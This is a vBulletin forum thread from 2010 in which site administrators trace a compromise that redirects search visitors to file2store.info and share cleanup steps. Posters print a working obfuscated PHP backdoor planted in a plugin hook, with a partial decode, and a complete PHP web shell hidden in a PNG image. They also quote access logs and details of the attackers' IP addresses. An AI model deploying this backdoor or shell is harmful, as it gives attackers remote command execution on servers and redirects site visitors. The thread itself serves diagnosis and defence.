Thanks for the update Michael
Security: Redirction to file2store.info
Collapse
X
-
-
I have not tracked via. logs on the clients server on when it was done or how yet, but I did find more info on a hacked site.
- datastore table
-- plugins
--- global_start hook
PHP Code:eval(CHR(36).CHR(120).CHR(61).CHR(39).@be84a99865650d96d3b8cfbea30adf99.CHR(39).CHR(59).@base64_decode('aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpO3Vuc2V0KCR4KTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywwKTtpbmlfc2V0KCdsb2dfZXJyb3JzJywwKTsNCiRyPSFlbXB0eSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pID8gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddIDogZ2V0ZW52KCdIVFRQX1JFRkVSRVInKTsNCmlmKHN0cmxlbigkcik+MTApDQp7DQoJJGlwPSRfU0VSVkVSWydSRU1PVEVfQUREUiddOyRobj1AZ2V0aG9zdGJ5YWRkcigkaXApOw0KCWlmKChzdHJwb3MoJGlwLCc2NS41NS4nKSE9PTApJiYoc3RycG9zKCRobiwnbXNuYm90Jyk9PT1mYWxzZSkpDQoJew0KCQkkcz1hcnJheSgnc2VhcmNoLmxpdmUuY29tJywnd3d3Lmdvb2dsZScsJ3NlYXJjaC55YWhvby5jb20nLCd3d3cuYmluZy5jb20nLCd5YW5kZXgucnUnLCdiYWlkdS5jb20nKTsNCgkJZm9yZWFjaCgkcyBhcyAkZSkNCgkJew0KCQkJaWYoKHN0cnBvcygkciwkZSkhPT1mYWxzZSkmJihlbXB0eSgkX0NPT0tJRVsndmJzcCddKSkpDQoJCQl7DQoJCQkJJGg9c3RydG91cHBlcihzdWJzdHIoQG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLDAsOCkpOw0KCQkJCWRpZSgiPGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiPnZhciB2YnNwPSckaCc7Ii5zdHJfcmVwbGFjZSgnXFwnLCdcXFxcJyxnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnWFZKcmM5b3dFUHdyTkRNZFNXT0hBQVlNY2QxTUFxUk4zMDM2K0dDcEhTRUxjSGc1eG9CVDVQL2VGU2xNcHJhUFcrM2UzaDB6MGhzNW82DQpQMVF1WEpja0ZUVjdyS25icmFqZGxPaDBkZXNWMm04M1VHOUVwZUVIS3VhU3F6bGI1WjVGU2RTY2FZUTZrSzFVdkpYbnV0aTdzOFN4Ymo2aQ0KaGJ6bnNUbWZXV3NhYkthWFRadWFybXl5ZVZlbTNHeWlBWjBSZUVWRE9kenFUUzlPelhtZnVrTTdiYlRwSVpqS2VuYkJkSEFFeUUwMGdKWXkNCnd1cDJGMDNFOGY5cXVnVUpRaWVMYjdRU0o4NjVBeVVHRzlESjUxeGdLMktkdWxZWHBjWTZHM2xWczlIaFFwSlh4SUhEdlFzY2dsWThMY3ZhDQpFcy80MU1TMHJ5aWd5akUvN0lGWS81Z21zKzUrckVQZUdULzRrLy9CTFVSejRDdFFTYThNVFNNUi95RC93VEtyOEFMeUUrOEVjcnBCQ0cvRA0KMkl2VDA1OUJqeEtRcFhQT0ZqUy9YNU5WcU5MSHhqZnpLWTBuMkpCbnF3MUFxSEdMNGJQc2I3RmtLMm4yOUgyMDErOHUvOGFqOXZEbjJHZkkNCmNsYktNcFRsZHdyaERmNEp0aERSSGNWbnAwNDY3WkxxL2NoNFBLTzhxQyswaEdkU0dvelRWazV2eGdRVjdaaGpKcUNNZXlubVdEQXFncFJMDQpoeFpOUVN6dHJaQXJSRkdmU29qSHpoeXFnam5xcTZxSkxSWitGOERZamI2dHFQbU9QenUxYjRzdE0yUmZzYTBUS0YzMFR1SXRkTTBRRG5lNg0KYncrclp1VkkrN2hWWHJDSnY3cG1naCt3MWdWTFVIaUI2aVl6WXlPenE4STJvY1VjdkVTN1dlNjBXT2NoOERyakRNRGh5WUpCMHFoYVp0Z3gNCnNFRmMwOU94QXJlcGVtTDNPTkE4cWJzUGtkNUw2cHc5bnl6R2E0U3MzaHprSzBmZkVIUE05MDJzMmFmWER3U1hXVnpwS2NFb05iV0hOM0pXDQpOL0FRJykpKS4iPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4iKTsNCgkJCX0NCgkJfQ0KCX0gDQp9'));
http://www.szone.us | http://www.gzhq.net
Twitter | Facebook | My:Hacks @ vBulletin.org
Member of Kiwanis Club of ChatsworthComment
-
I also have this problem.
I have not tracked via. logs on the clients server on when it was done or how yet, but I did find more info on a hacked site.
- datastore table
-- plugins
--- global_start hook
PHP Code:eval(CHR(36).CHR(120).CHR(61).CHR(39).@be84a99865650d96d3b8cfbea30adf99.CHR(39).CHR(59).@base64_decode('aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpO3Vuc2V0KCR4KTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywwKTtpbmlfc2V0KCdsb2dfZXJyb3JzJywwKTsNCiRyPSFlbXB0eSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pID8gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddIDogZ2V0ZW52KCdIVFRQX1JFRkVSRVInKTsNCmlmKHN0cmxlbigkcik+MTApDQp7DQoJJGlwPSRfU0VSVkVSWydSRU1PVEVfQUREUiddOyRobj1AZ2V0aG9zdGJ5YWRkcigkaXApOw0KCWlmKChzdHJwb3MoJGlwLCc2NS41NS4nKSE9PTApJiYoc3RycG9zKCRobiwnbXNuYm90Jyk9PT1mYWxzZSkpDQoJew0KCQkkcz1hcnJheSgnc2VhcmNoLmxpdmUuY29tJywnd3d3Lmdvb2dsZScsJ3NlYXJjaC55YWhvby5jb20nLCd3d3cuYmluZy5jb20nLCd5YW5kZXgucnUnLCdiYWlkdS5jb20nKTsNCgkJZm9yZWFjaCgkcyBhcyAkZSkNCgkJew0KCQkJaWYoKHN0cnBvcygkciwkZSkhPT1mYWxzZSkmJihlbXB0eSgkX0NPT0tJRVsndmJzcCddKSkpDQoJCQl7DQoJCQkJJGg9c3RydG91cHBlcihzdWJzdHIoQG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLDAsOCkpOw0KCQkJCWRpZSgiPGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiPnZhciB2YnNwPSckaCc7Ii5zdHJfcmVwbGFjZSgnXFwnLCdcXFxcJyxnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnWFZKcmM5b3dFUHdyTkRNZFNXT0hBQVlNY2QxTUFxUk4zMDM2K0dDcEhTRUxjSGc1eG9CVDVQL2VGU2xNcHJhUFcrM2UzaDB6MGhzNW82DQpQMVF1WEpja0ZUVjdyS25icmFqZGxPaDBkZXNWMm04M1VHOUVwZUVIS3VhU3F6bGI1WjVGU2RTY2FZUTZrSzFVdkpYbnV0aTdzOFN4Ymo2aQ0KaGJ6bnNUbWZXV3NhYkthWFRadWFybXl5ZVZlbTNHeWlBWjBSZUVWRE9kenFUUzlPelhtZnVrTTdiYlRwSVpqS2VuYkJkSEFFeUUwMGdKWXkNCnd1cDJGMDNFOGY5cXVnVUpRaWVMYjdRU0o4NjVBeVVHRzlESjUxeGdLMktkdWxZWHBjWTZHM2xWczlIaFFwSlh4SUhEdlFzY2dsWThMY3ZhDQpFcy80MU1TMHJ5aWd5akUvN0lGWS81Z21zKzUrckVQZUdULzRrLy9CTFVSejRDdFFTYThNVFNNUi95RC93VEtyOEFMeUUrOEVjcnBCQ0cvRA0KMkl2VDA1OUJqeEtRcFhQT0ZqUy9YNU5WcU5MSHhqZnpLWTBuMkpCbnF3MUFxSEdMNGJQc2I3RmtLMm4yOUgyMDErOHUvOGFqOXZEbjJHZkkNCmNsYktNcFRsZHdyaERmNEp0aERSSGNWbnAwNDY3WkxxL2NoNFBLTzhxQyswaEdkU0dvelRWazV2eGdRVjdaaGpKcUNNZXlubVdEQXFncFJMDQpoeFpOUVN6dHJaQXJSRkdmU29qSHpoeXFnam5xcTZxSkxSWitGOERZamI2dHFQbU9QenUxYjRzdE0yUmZzYTBUS0YzMFR1SXRkTTBRRG5lNg0KYncrclp1VkkrN2hWWHJDSnY3cG1naCt3MWdWTFVIaUI2aVl6WXlPenE4STJvY1VjdkVTN1dlNjBXT2NoOERyakRNRGh5WUpCMHFoYVp0Z3gNCnNFRmMwOU94QXJlcGVtTDNPTkE4cWJzUGtkNUw2cHc5bnl6R2E0U3MzaHprSzBmZkVIUE05MDJzMmFmWER3U1hXVnpwS2NFb05iV0hOM0pXDQpOL0FRJykpKS4iPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4iKTsNCgkJCX0NCgkJfQ0KCX0gDQp9'));
I found the same code
Comment
-
ran the code in a base64 decode
PHP Code:if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);
ini_set('display_errors',0);ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10)
{
$ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false))
{
$s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
foreach($s as $e)
{
if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp'])))
{
$h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8));
die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVJrc9owEPwrNDMdSWOHAAYMcd1MAqRN3036+GCpHSELcHg5xoBT5P/eFSlMpraPW+3e3h0z0hs5o6
P1QuXJckFTV7rKnbrajdlOh0desV2m83UG9EpeEHKuaSqzlb5Z5FSdScaYQ6kK1UvJXnuti7s8Sxbj6i
hbznsTmfWWsabKaXTZuarmyyeVem3GyiAZ0ReEVDOdzqTS9OzXmfukM7bbTpIZjKenbBdHAEyE00gJYy
wup2F03E8f9qugUJQieLb7QSJ865AyUGG9DJ51xgK2KdulYXpcY6G3lVs9HhQpJXxIHDvQscglY8Lcva
Es/41MS0ryigyjE/7IFY/5gms+5+rEPeGT/4k//BLURz4CtQSa8MTSMR/yD/wTKr8ALyE+8EcrpBCG/D
2IvT059BjxKQpXPOFjS/X5NVqNLHxjfzKY0n2JBnqw1AqHGL4bPsb7FkK2n29H201+8u/8aj9vDn2GfI
clbKMpTldwrhDf4JthDRHcVnp0467ZLq/ch4PKO8qC+0hGdSGozTVk5vxgQV7ZhjJqCMeynmWDAqgpRL
hxZNQSztrZArRFGfSojHzhyqgjnqq6qJLRZ+F8DYjb6tqPmOPzu1b4stM2Rfsa0TKF30TuItdM0QDne6
bw+rZuVI+7hVXrCJv7pmgh+w1gVLUHiB6iYzYyOzq8I2ocUcvES7We60WOch8DrjDMDhyYJB0qhaZtgx
sEFc09OxArepemL3ONA8qbsPkd5L6pw9nyzGa4Ss3hzkK0ffEHPM902s2afXDwSXWVzpKcEoNbWHN3JW
N/AQ')))."</script></body></html>");
}
}
}
}
http://www.szone.us | http://www.gzhq.net
Twitter | Facebook | My:Hacks @ vBulletin.org
Member of Kiwanis Club of ChatsworthComment
-
Fixing the problem of redirect is easy.
In my case it was stuck in the datastore via. a script that was ran. It did not show up in any plugins from AdminCP.
I found it via. phpmyadmin search of the database looking for "base64" as a search term across all tables and data.
I also downloaded the site and did a search across all files and found the same info in datastore cache file.
- /forums/includes/datastore/datastore_cache.php
Finding out how they got in and plug the hole will be a little work.
( Looking through installed 3rd party code add-ons for holes)
On another note, a colleague was working on a site and found a PNG image w/ php code in it.
- profilepic60_1.png
PHP Code:<?php
ob_end_clean(); ob_start(); $disablefuncs = array(); function myshellexec($cmd) { global $disablefuncs; if (empty($cmd)) { return ''; } $result = ''; if (is_callable('exec') and !in_array('exec', $disablefuncs)) { exec($cmd, $result); $result = join("\n", $result); } elseif (($result = `$cmd`) !== FALSE) { } elseif (is_callable('system') and !in_array('system')) { ob_start(); system($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) { ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_resource($fp = popen($cmd,"r"))) { while(!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } else { $result = '****. Can\'t execute command - paranoidal admin[s] has been disabled many functions!'; } return $result; } if (is_callable('ini_get')) { $disablefuncs = ini_get("disable_functions"); if (!empty($disablefuncs)) { $disablefuncs = str_replace(' ', '', $disablefuncs); $disablefuncs = explode(',', $disablefuncs); } else { $disablefuncs = array(); } } if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); } if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); } if (isset($_FILES['upfile'])) { if (is_uploaded_file($_FILES['upfile']['tmp_name'])) { move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']); echo '<b>Uploaded!</b>'; } } ?><br>
</pre>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit">
</form><br>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit">
</form>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">
upload: <input type="text" name="fname" style="width:200px" value="profilepic605_1.png"><input type="file" name="upfile" style="width:70%"><input type="submit">
</form>
<script>document.getElementById("bash").focus();</script>
</font>
<?php
$text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean(); echo $text; ?>Last edited by Zachariah B; Mon 28 Jun '10, 2:58pm.http://www.szone.us | http://www.gzhq.net
Twitter | Facebook | My:Hacks @ vBulletin.org
Member of Kiwanis Club of ChatsworthComment
-
You should be looking in the web server logs, about the time your on-disk files were modified.
Comment
-
I found it via. phpmyadmin search of the database looking for "base64" as a search term across all tables and data.
i have the problem too. only on index page. 2 forums at the same server. 2 times the problem.
but no idee how to solve the problem. and where it comes from. what can i find in server log for example ?Last edited by thompson; Wed 30 Jun '10, 11:27am.Comment
-
The problem is in datastore table.
When you disable/enable a product, the datastore is refreshed and the problem is solved...
How can you prevent the datastore is changed from the outside?Comment
-
It may also depend on a product that we all.
I have:
Advanced BBCode Permissions
Automatic Thread Tagger
Buy Thread
Cyb - Advanced Forum Statistics
Cyb - Tic-Tac-Toe
Doublepost Prevention Plus
Easy Forms
Geek Auto-Linker
Hide BB Codes
Invitation System
KX - Spider Permissions
MGC chatbox Evo
Mobile Device Detection
Mobile Style Options
Post Thank You Hack
Quick Editor Improver
Resize Image By Moonlight Knight
Rotating Banner System
Sorky03 - SubForum List Control - V1.8.0
Spider Display
TagCloud - ForumHome
UserGroups Legend In Forumhome
vBSEO
vBSEO :: Sitemap Generator
vBSEO.com Style 2.0
vbStopForumSpam
Who Has Read a Thread.
Yet Another Mass Private Message SystemComment
-
More findings:
They are logging in using username and password of an Admin on the site.
This username and password was harvested via. spyware / malware / key logger.
- Scan / Clean your personal computer for problems
- Change your VB password for your AdminCP accounts
Server Access Log:
Code:7/12/2010 5:14:06 AM Search String: 204.45.70.118 Line 3703 - <204.45.70.118> - - [12/Jul/2010:07:43:05 -0400] "GET /admincp/ HTTP/1.1" 200 2339 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" Line 3734 - <204.45.70.118> - - [12/Jul/2010:07:43:36 -0400] "POST /login.php?do=login HTTP/1.1" 302 20 "/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" Line 3803 - <204.45.70.118> - - [12/Jul/2010:07:45:31 -0400] "POST /admincp/plugin.php?do=update HTTP/1.1" 200 1709 "/admincp/plugin.php?do=edit&pluginid=320" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
Reported Abuse:
IP Information for 204.45.70.118
IP Location: United States United States Woodstock Fdc Servers.net Llc
Resolve Host: fdc5.lrdns.com
IP Address: 204.45.70.118 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
OrgName: FDCservers.net
OrgID: FDCSE
Address: 141 w jackson blvd.
Address: suite #1135
City: Chicago
StateProv: IL
PostalCode: 60098
Country: US
ReferralServer: rwhois://rwhois.fdcservers.net:4321
NetRange: 204.45.0.0 - 204.45.255.255
CIDR: 204.45.0.0/16
OriginAS: AS30058
NetName: FDCSERVERS
NetHandle: NET-204-45-0-0-1
Parent: NET-204-0-0-0-0
NetType: Direct Allocation
NameServer: NS3.FDCSERVERS.NET
NameServer: NS4.FDCSERVERS.NET
Comment:
RegDate: 2009-07-20
Updated: 2009-07-20
RAbuseHandle: ABUSE438-ARIN
RAbuseName: ABUSE department
RAbusePhone: +1-630-729-0228
RAbuseEmail: [email protected]http://www.szone.us | http://www.gzhq.net
Twitter | Facebook | My:Hacks @ vBulletin.org
Member of Kiwanis Club of ChatsworthComment
-
They did not get by the password change, but I have logs
Code:7/12/2010 2:41:06 PM Search String: 72.113.214.199 Line 19861 - <72.113.214.199> - - [12/Jul/2010:16:59:59 -0400] "POST /login.php?do=login HTTP/1.1" 302 20 "/admincp/" "Linux; U; Android 2.1-update1; en-us; Droid Build/ESE81) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17" Line 19901 - <72.113.214.199> - - [12/Jul/2010:17:02:21 -0400] "GET /admincp/plugin.php?do=edit&pluginid=320 HTTP/1.1" 200 2360 "-" "Mozilla/5.0 (Linux; U; Android 2.1-update1; en-us; Droid Build/ESE81) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17" Line 19910 - <72.113.214.199> - - [12/Jul/2010:17:03:41 -0400] "POST /admincp/plugin.php?do=update HTTP/1.1" 200 1709 "/admincp/plugin.php?do=edit&pluginid=320" "Mozilla/5.0 (Linux; U; Android 2.1-update1; en-us; Droid Build/ESE81) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17"
OrgName: Cellco Partnership DBA Verizon Wireless
OrgID: CLLC
Address: 180 Washington Valley Road
City: Bedminster
StateProv: NJ
PostalCode: 07039
Country: US
NetRange: 72.96.0.0 - 72.127.255.255
CIDR: 72.96.0.0/11
NetName: WIRELESSDATANEWORK
NetHandle: NET-72-96-0-0-1
Parent: NET-72-0-0-0-0
NetType: Direct Allocation
NameServer: CARKDNS.VZWDOMAIN.COM
NameServer: NJBRDNS.VZWDOMAIN.COM
Comment:
RegDate: 2005-06-28
Updated: 2006-01-18
RTechHandle: MGE16-ARIN
RTechName: George, Matt
RTechPhone: +1-908-306-7000
RTechEmail: [email protected]http://www.szone.us | http://www.gzhq.net
Twitter | Facebook | My:Hacks @ vBulletin.org
Member of Kiwanis Club of ChatsworthComment
Related Topics
Collapse
-
by MrSquidI worked on my site (which uses 5.0.5) yesterday and everything was working fine. Today, Site Builder is greyed out on my Forum & Blog - and any pages relating to those (like reading any posts or...
-
Channel: Support Issues & Questions
-
Comment